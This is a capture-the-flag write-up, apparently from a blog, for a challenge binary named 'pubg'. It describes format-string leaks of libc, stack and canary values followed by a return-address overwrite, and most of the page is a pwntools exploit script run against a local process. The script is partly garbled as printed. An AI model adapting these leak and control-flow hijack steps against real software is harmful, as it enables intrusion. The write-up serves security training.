Interesting game
PUBG
PUBG
- PICK A GUN first
- AND you have two choise : gang or gou
- gou :
you may find AWM
- gang :
if you dont have AWM you will die
- IF you win you can leak something and you can overflow to control the RIP
- so enjoy the game
Entry point
- you can leak libc by
1 2 3 4 5 6 7 8 9
|
for ( j = 0; j <= 3; ++j ) { if ( s[j] != buf[j] ) { printf(s); puts(" has no airdrop"); return __readfsqword(0x28u) ^ v4; } }
|
- Luckily you can leak j .so you can burp the position of airdrop
- so you will get the AWM
- and use the only chance to leak canary
- so go to control EIP
EXP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57
|
from pwn import * def (c): p.readuntil("> ") p.sendline(str(c)) def airdrop(c): cmd(2) p.readuntil("position:") p.send(c)
p=process("./pubg") p=remote("127.0.0.1",1025) cmd(1) cmd(1) airdrop("%p%p%p%pn") p.readuntil("0x25") base=int(p.readline(),16)-0x5cd700+0x7fd980588000-0x7fd98058d000 log.warning("Libc:%s",hex(base)) airdrop("%a%a%a%a%a") p.readuntil("ap-10220x0.0") stack=int("0x"+p.read(11)+"0",16) log.info("stack:%s",hex(stack))
res="" for x in range(3): for y in range(1,256): if (chr(y)!='n' and chr(y)!='$' and chr(y)!='*' and chr(y)!='|'):
airdrop(res+"{}%p|%pn".format(chr(y).ljust(3-x,'x01'))) p.readuntil("|") data=p.readline() if data=="(nil)n": data=0 else : data=int(data,16) if (data==x+1): res+=chr(y) break else: continue airdrop(res) cmd(1) p.readuntil("chicken:n") canary_add=(0x7ffe2c5822c8-0x7ffe2c5823d0)+stack
p.sendline(str(canary_add+1)) sleep(0.1) p.readuntil("The ") data="x00"+p.read(7) canary=u64(data.ljust(8,'x00')) log.info("Cnary:%s",hex(canary)) p.readuntil("~n") off=0x20 one=base+0x45216 p.send("x00"*off+p64(canary)*3+p64(one)+"n") p.interactive()
|
review
Is a interesting game
There are lots of little trick in this challenge.
近期评论